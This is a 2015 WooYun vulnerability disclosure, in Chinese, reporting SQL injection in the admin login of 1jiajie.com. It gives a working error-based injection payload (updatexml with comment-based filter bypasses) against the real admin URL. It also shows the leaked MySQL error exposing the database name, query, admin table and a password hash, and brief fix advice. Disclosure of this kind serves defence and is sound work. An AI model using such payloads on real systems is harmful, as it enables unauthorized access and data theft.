当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146397

漏洞标题:E家洁某管理后台SQL注射

相关厂商:1jiajie.com

漏洞作者: we8_

提交时间:2015-10-13 12:46

修复时间:2015-10-18 12:48

公开时间:2015-10-18 12:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-13: 细节已通知厂商并且等待厂商处理中
2015-10-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

http://admin.1jiajie.com/v2/index.php?action=login&do=auth


POST:username=admin'/**/and/**/1<(updatexml(1,concat(0x5e24,(select/**/user()),0x5e24),1))/**/and/**/'1'/**/like/**/'1&password=12345&user_id=&user_name=


1jiajie.png

漏洞证明:

MySQL Query Error
Mysql error description: XPATH syntax error: '^$sq_ejiajie_v2^$'
Mysql error number: 1105
Date: 2015-10-13 @ 12:38
Script: http://admin.1jiajie.com/v2/index.php?action=login&do=auth
SQL: SELECT COUNT(*) as count FROM jc_admin_user WHERE `username` ='admin'/**/and/**/1<(updatexml(1,concat(0x5e24,(select/**/database()),0x5e24),1))/**/and/**/'1'/**/like/**/'1' AND `password` ='389e85b9d5ae561c008a5147176c2704' AND `enable` ='1' AND `is_stop` ='0'

修复方案:

1、此网站过滤了= 空格 注释等符号。但是没有过滤","、"()"等,所以建议修改防注入策略。
2、找回密码功能也有问题。

版权声明:转载请注明来源 we8_@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-18 12:48

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无